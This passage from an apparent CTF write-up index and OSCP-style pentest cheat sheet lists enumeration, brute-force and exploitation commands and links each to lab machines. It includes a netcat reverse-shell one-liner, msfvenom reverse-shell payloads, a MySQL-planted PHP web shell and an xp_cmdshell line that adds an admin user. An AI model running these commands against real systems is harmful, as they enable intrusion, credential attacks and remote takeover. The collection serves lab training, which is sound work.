[`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_file_modified_time_window"></a> #### enumerate_file_modified_time_window [⇡](#enumerate) find files modified within a time window ```shell find / -newermt 2020-12-27 ! -newermt 2020-12-30 -type f 2>/def/null ``` [+] https://www.tripwire.com/state-of-security/security-data-protection/passing-offensive-security-certified-professional-exam-oscp/ --- <a name="enumerate_nmap_initial"></a> #### enumerate_nmap_initial [⇡](#enumerate) run nmap initial scans ```shell sudo nmap -Pn -sC -sV -O -oN initial <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_tcp"></a> #### enumerate_nmap_tcp [⇡](#enumerate) run nmap full tcp scans ```shell nmap -Pn -sC -sV -p- --min-rate 10000 -oN tcp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_nmap_udp"></a> #### enumerate_nmap_udp [⇡](#enumerate) run nmap full udp scans ```shell nmap -Pn -sU -p- -oN udp <attackerip> ``` [+] https://medium.com/@ranakhalil101 [+] https://medium.com/@bondo.mike [+] https://www.jibbsec.com/tags/oscplike/ [+] https://0xdf.gitlab.io/tags.html#oscp-like --- <a name="enumerate_proto_distcc"></a> #### enumerate_proto_distcc [⇡](#enumerate) ```shell msf: exploit/unix/misc/distcc_exec ``` --- <a name="enumerate_proto_dns"></a> #### enumerate_proto_dns [⇡](#enumerate) ```shell reverse lookup to find all hostnames associated with an ip: dig +noall +answer -x <ipaddress> @<dnsserver> dns enumeration: dnsenum -o outputfile -f /usr/share/dnsrecon/namelist.txt -o outputfile domain bruteforce: nmap -p 80 --script dns-brute.nse <domain.name> python dnscan.py -d <domain.name> -w ./subdomains-10000.txt zone transfer: dig axfr @<dnsserver> <domain.name> host -t axfr <domain.name> <dnsserver> host -l <domain.name> <dnsserver> ``` --- <a name="enumerate_proto_finger"></a> #### enumerate_proto_finger [⇡](#enumerate) ```shell finger username@<targetip> ``` --- <a name="enumerate_proto_ftp"></a> #### enumerate_proto_ftp [⇡](#enumerate) check if version is vulnerable and exploit is available. check if anonymous access is enabled. check if read permission for sensitive files. check if write permission within webroot/uploads or other critical directories. check if ftp root directory is also http root directory and upload php reverse shell. remember - binary and ascii transfer mode switch ```shell ftp passive mode: ftp -p 192.168.92.192 bruteforce ftp login: use auxiliary/scanner/ftp/ftp_login misc: nmap --script=*ftp* --script-args=unsafe=1 -p 20,21 <targetip> nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <targetip> hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f <targetip> ftp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://medium.com/@ranakhalil101/my-oscp-journey-a-review-fa779b4339d9 --- <a name="enumerate_proto_http"></a> #### enumerate_proto_http [⇡](#enumerate) identify web server, technology, application. identify versions. run nikto, dirb/dirbuster, gobuster scans. look at robots.txt. look at source code. check for default creds, lfi/rfi, sqli, wordpress ```shell bash /usr/share/sparta/scripts/x11screenshot.sh <targetip> cewl http://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage cewl https://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage curl -i <targetip> ## check http response headers gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500" gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<taregtip>/ -t 20 -U <username> -P <password> hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-get / hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-head / nc -v -n -w1 <targetip> <targetport> ## netcat to grab banner nikto -o "[OUTPUT].txt" -p <targetport> -h <targetip> nmap -Pn -sV -sC -vvvvv -p<targetport> <targetip> -oA [OUTPUT] w3m -dump <targetip>/robots.txt wafw00f http://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall wafw00f https://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall whatweb <targetip>:<targetport> --color=never --log-brief="[OUTPUT].txt" ## identify web technology ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 2. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | | 3. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 4. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_ldap"></a> #### enumerate_proto_ldap [⇡](#enumerate) ```shell ldapsearch -x -s base -h <targetip> -p 389 ``` --- <a name="enumerate_proto_mssql"></a> #### enumerate_proto_mssql [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/mssql-default-userpass.txt -u -f <targetip> mssql hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mssql://<targetip> nmap --script=ms-sql-* --script-args mssql.instance-port=1433 <targetip> nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user anderson cooper /add" nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators anderson /add" nmap -vv -sV -Pn -p <targetport> --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa <targetip> ``` --- <a name="enumerate_proto_mysql"></a> #### enumerate_proto_mysql [⇡](#enumerate) ```shell nmap --script=mysql-* <targetip> bruteforce: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mysql://<targetip> nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv <targetip> create a reverse shell: select '<?php exec($_GET["cmd"]); ?>' from store into dumpfile '/var/www/https/blogblog/wp-content/uploads/shell.php' udf: if mysql is running as root AND /usr/lib/lib_mysqludf_sys.so file is present, we can privesc nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <targetip> -p <targetport> hydra -s <targetport> -C ./wordlists/mysql-default-userpass.txt -u -f <targetip> mysql ``` --- <a name="enumerate_proto_nfs"></a> #### enumerate_proto_nfs [⇡](#enumerate) ```shell nmap -sV --script=nfs-* <targetip> showmount -e <targetip> ``` --- <a name="enumerate_proto_oracle"></a> #### enumerate_proto_oracle [⇡](#enumerate) ```shell msfcli auxiliary/scanner/oracle/tnslsnr_version rhosts=<targetip> E msfcli auxiliary/scanner/oracle/sid_enum rhosts=<targetip> E tnscmd10g status -h <targetip> hydra -uf -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 oracle-listener ``` --- <a name="enumerate_proto_postgres"></a> #### enumerate_proto_postgres [⇡](#enumerate) ```shell hydra -s <targetport> -C /usr/share/sparta/wordlists/postgres-default-userpass.txt -u -f <targetip> postgres hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 postgres ``` --- <a name="enumerate_proto_rdp"></a> #### enumerate_proto_rdp [⇡](#enumerate) ```shell perl /usr/share/sparta/scripts/rdp-sec-check.pl <targetip>:<targetport> ncrack -vv --user administrator -P /usr/share/wordlists/rockyou.txt rdp://<targetip> ``` --- <a name="enumerate_proto_rpc"></a> #### enumerate_proto_rpc [⇡](#enumerate) ```shell rpcinfo -p <targetip> ``` --- <a name="enumerate_proto_smb"></a> #### enumerate_proto_smb [⇡](#enumerate) ```shell locate all smb scripts on kali and run them to gather details: locate *.nse | grep smb try enum4linux to get open shares, permissions and local users: enum4linux -a <targetip> nbtscan -vhr <targetip> scans: nmap -p139,445 --script smb-vuln-* --script-args=unsafe=1 <targetip> nmap -p139,445 --script smb-enum-* --script-args=unsafe=1 <targetip> null sessions: bash -c "echo 'srvinfo' | rpcclient -U % <targetip>" groups: nmap -vv -p139,445 --script=smb-enum-groups <targetip> users: bash -c "echo 'enumdomusers' | rpcclient -U % <targetip>" admins: net rpc group members "Domain Admins" -U % -I <targetip> shares: nmap -vv -p139,445 --script=smb-enum-shares <targetip> sessions: nmap -vv -p139,445 --script=smb-enum-sessions <targetip> policies: nmap -vv -p139,445 --script=smb-enum-domains <targetip> version: use auxiliary/scanner/smb/smb_version bruteforce: use auxiliary/scanner/smb/smb_login bash -c "echo 'enumdomusers' | rpcclient <targetip> -U%" bash -c "echo 'srvinfo' | rpcclient <targetip> -U%" bash /usr/share/sparta/scripts/smbenum.sh <targetip> enum4linux <targetip> nbtscan -v -h <targetip> net rpc group members "Domain Admins" -I <targetip> -U% nmap -p<targetport> --script=smb-enum-domains <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-groups <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-sessions <targetip> -vvvvv nmap -p<targetport> --script=smb-enum-shares <targetip> -vvvvv nmap -sV -Pn -vv -p <targetport> --script=smb-vuln* --script-args=unsafe=1 <targetip> python /usr/share/doc/python-impacket-doc/examples/samrdump.py <targetip> <targetport>/SMB smbclient -L <targetip> smbclient //<targetip>/admin$ -U john smbclient //<targetip>/ipc$ -U john smbclient //<targetip>/tmp smbclient \\<targetip>\ipc$ -U john winexe -U username //<targetip> "cmd.exe" --system ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smb_anonymous_access"></a> #### enumerate_proto_smb_anonymous_access [⇡](#enumerate) open shares, anonymous logins ```shell # connect to and explore smb share: smbclient -N -L \\\\<targetip> smbclient -N \\\\<targetip>\\$share # look for null sessions "allows sessions using username '', password ''", use smbclient to connect and explore smb share: enum4linux -a <targetip> smbclient -U "" //<targetip>/share$ (password: "") smbclient //<targetip>/share$ -U lazysysadmin -p 445 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_smtp"></a> #### enumerate_proto_smtp [⇡](#enumerate) ```shell smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M EXPN -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport> # send email: swaks --to [email protected] --from [email protected] --server 192.168.92.167:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" ``` --- <a name="enumerate_proto_snmp"></a> #### enumerate_proto_snmp [⇡](#enumerate) ```shell snmpcheck -t <targetip> nmap -sU -p 161 --script=*snmp* <targetip> xprobe2 -v -p udp:161:open <targetip> use auxiliary/scanner/snmp/snmp_login use auxiliary/scanner/snmp/snmp_enum enumerate open ports, running services and applications: snmpwalk -v2c -c public <targetip> . snmp-check -t 5 -c public <targetip> scan using multiple community strings: echo public >community echo private >>community echo manager >>community for ip in $(seq 200 254); do echo 10.11.1.${ip}; done >ips onesixtyone -c community -i ips onesixtyone -c /usr/share/wordlists/dirb/small.txt <targetip> enumerate windows users: snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25 for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do snmpwalk -v 1 -c $i 192.168.1.200; done | grep -e "Timeout" enumerate current windows processes: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2 enumerate windows open tcp ports: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.6.13.1.3 enumerate installed software: snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2 ``` --- <a name="enumerate_proto_sql"></a> #### enumerate_proto_sql [⇡](#enumerate) ```shell locate all sql scripts on kali and run them to gather details: locate *.nse | grep sql ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_sql_ssis_dtsconfig"></a> #### enumerate_proto_sql_ssis_dtsconfig [⇡](#enumerate) The `.dtsConfig` files are used by [SQL Server Integration Services (SSIS)](https://en.wikipedia.org/wiki/SQL_Server_Integration_Services) and can contain plaintext credentials for SQL users. ```shell cat *.dtsConfig ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_proto_ssh"></a> #### enumerate_proto_ssh [⇡](#enumerate) ```shell authorized_keys: ssh-keygen -t rsa -b 2048 enter a custom filename copy contents of <filename>.pub to /home/<username>/.ssh/authorized_keys ssh -i <filename>.pub <username>@<targetip> ssh enum: msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.11.1.0/24 msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt msf auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 254 msf auxiliary(scanner/ssh/ssh_enumusers) > run ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_proto_telnet"></a> #### enumerate_proto_telnet [⇡](#enumerate) ```shell nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s <targetip> use auxiliary/scanner/telnet/telnet_version msf auxiliary(telnet_version) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_version) > set THREADS 254 msf auxiliary(telnet_version) > run use auxiliary/scanner/telnet/telnet_login msf auxiliary(telnet_login) > set BLANK_PASSWORDS false msf auxiliary(telnet_login) > set PASS_FILE passwords.txt msf auxiliary(telnet_login) > set RHOSTS 10.11.1.0/24 msf auxiliary(telnet_login) > set THREADS 254 msf auxiliary(telnet_login) > set USER_FILE users.txt msf auxiliary(telnet_login) > set VERBOSE false msf auxiliary(telnet_login) > run ``` --- <a name="enumerate_proto_webdav"></a> #### enumerate_proto_webdav [⇡](#enumerate) ```shell default pass for xampp: wampp/xampp test uploading different file extensions: davtest -url http://10.11.1.10 test uploading different file extensions, with given creds: davtest -url http://10.11.1.10 -auth username:password remove files uploaded during test: davtest -cleanup create a reverse shell (asp file even if not allowed) connect to webdav share, bypass upload restrictions: cadaver http://10.11.1.10 mkdir temp cd temp put revshell.asp revshell.txt copy revshell.txt revshell.asp open nc to catch reverse shell connection browse webdav share and open uploaded file ``` --- <a name="exploit"></a> ### ⚙️ Exploit [🡑](#ttps) <a name="exploit_apache_tomcat"></a> #### exploit_apache_tomcat [⇡](#exploit) leverage Tomcat Web Application Manager to deploy a malicious .war file that spawns a reverse shell ```shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f war >backdoor.war # deploy war file through tomcat manager # start netcat listener and visit the link for uploaded jsp file to trigger webshell jar -xvf backdoor.war http://<targetip>:<targetport>/<.war filename w/o extension>/<.jsp filename in war archive w/ extension> ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="exploit_bash_reverseshell"></a> #### exploit_bash_reverseshell [⇡](#exploit) spawn a bash reverse shell to gain interactive access on the target system ```shell nc -nlvp <attackerport> rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attackerip> <attackerport> >/tmp/f ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="exploit_bof"></a> #### exploit_bof [⇡](#exploit) create a bof exploit to execute arbitrary code and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_cloudme_bof"></a> #### exploit_cloudme_bof [⇡](#exploit) the CloudMe version 1.11.12 is vulnerable to a buffer overflow that could be used to gain interactive access on the target system, possibly with elevated privileges ```shell msfvenom -p windows/shell_reverse_tcp lhost=<attackerip> lport=<attackerport> -b "\x00\x0a\x0d" -f python -a x86 --platform windows -e x86/shikata_ga_nai sudo nc -nlvp <attackerport> python 48389.py ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48389 --- <a name="exploit_cmdexec"></a> #### exploit_cmdexec [⇡](#exploit) execute arbitrary commands via a 